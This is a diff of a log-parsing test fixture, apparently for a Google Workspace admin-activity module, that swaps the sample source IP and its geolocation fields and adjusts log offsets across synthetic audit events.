@@ -2680,7 +2496,7 @@ "event.end": "2002-10-02T16:00:00.000Z", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REQUEST_MAILBOX_DUMP\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"BEGIN_DATE_TIME\",\"value\":\"2002-10-02T15:00:00Z\"},{\"name\":\"EMAIL_EXPORT_INCLUDE_DELETED\",\"value\":\"true\"},{\"name\":\"EMAIL_EXPORT_PACKAGE_CONTENT\",\"value\":\"contents\"},{\"name\":\"SEARCH_QUERY_FOR_DUMP\",\"value\":\"foo bar\"},{\"name\":\"END_DATE_TIME\",\"value\":\"2002-10-02T16:00:00Z\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REQUEST_MAILBOX_DUMP\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"BEGIN_DATE_TIME\",\"value\":\"2002-10-02T15:00:00Z\"},{\"name\":\"EMAIL_EXPORT_INCLUDE_DELETED\",\"value\":\"true\"},{\"name\":\"EMAIL_EXPORT_PACKAGE_CONTENT\",\"value\":\"contents\"},{\"name\":\"SEARCH_QUERY_FOR_DUMP\",\"value\":\"foo bar\"},{\"name\":\"END_DATE_TIME\",\"value\":\"2002-10-02T16:00:00Z\"}]}}", "event.provider": "admin", "event.start": "2002-10-02T15:00:00.000Z", "event.type": [ 
@@ -2697,27 +2513,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 19993, + "log.offset": 19947, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -2741,7 +2553,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"RESEND_USER_INVITE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"RESEND_USER_INVITE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "event.provider": "admin", "event.type": [ "info", 
@@ -2755,27 +2567,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 20656, + "log.offset": 20609, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -2799,7 +2607,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"RESET_SIGNIN_COOKIES\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"RESET_SIGNIN_COOKIES\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "event.provider": "admin", "event.type": [ "change", 
@@ -2812,27 +2620,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 21083, + "log.offset": 21035, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -2856,7 +2660,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"SECURITY_KEY_REGISTERED_FOR_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"SECURITY_KEY_REGISTERED_FOR_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "event.provider": "admin", "event.type": [ "change", 
@@ -2869,27 +2673,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 21467, + "log.offset": 21418, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -2913,7 +2713,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REVOKE_SECURITY_KEY\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REVOKE_SECURITY_KEY\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "event.provider": "admin", "event.type": [ "change", 
@@ -2926,27 +2726,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 21863, + "log.offset": 21813, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -2970,7 +2766,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"USER_INVITE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"USER_INVITE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "event.provider": "admin", "event.type": [ "info", 
@@ -2984,27 +2780,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 22246, + "log.offset": 22195, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -3028,7 +2820,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"VIEW_TEMP_PASSWORD\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"VIEW_TEMP_PASSWORD\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "event.provider": "admin", "event.type": [ "info", 
@@ -3042,27 +2834,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 22666, + "log.offset": 22614, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -3086,7 +2874,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"TURN_OFF_2_STEP_VERIFICATION\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"TURN_OFF_2_STEP_VERIFICATION\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "event.provider": "admin", "event.type": [ "change", 
@@ -3099,27 +2887,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 23093, + "log.offset": 23040, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -3143,7 +2927,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UNBLOCK_USER_SESSION\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UNBLOCK_USER_SESSION\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "event.provider": "admin", "event.type": [ "change", 
@@ -3156,27 +2940,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 23485, + "log.offset": 23431, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -3200,7 +2980,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UNENROLL_USER_FROM_TITANIUM\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UNENROLL_USER_FROM_TITANIUM\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "event.provider": "admin", "event.type": [ "change", 
@@ -3213,27 +2993,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 23869, + "log.offset": 23814, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -3257,7 +3033,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"ARCHIVE_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"ARCHIVE_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "event.provider": "admin", "event.type": [ "change", 
@@ -3270,27 +3046,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 24260, + "log.offset": 24204, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -3314,7 +3086,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UPDATE_BIRTHDATE\",\"parameters\":[{\"name\":\"BIRTHDATE\",\"value\":\"2002-10-02T15:00:00Z\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UPDATE_BIRTHDATE\",\"parameters\":[{\"name\":\"BIRTHDATE\",\"value\":\"2002-10-02T15:00:00Z\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "event.provider": "admin", "event.type": [ "change", 
@@ -3328,27 +3100,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 24636, + "log.offset": 24579, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -3372,7 +3140,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CREATE_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CREATE_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "event.provider": "admin", "event.type": [ "creation", 
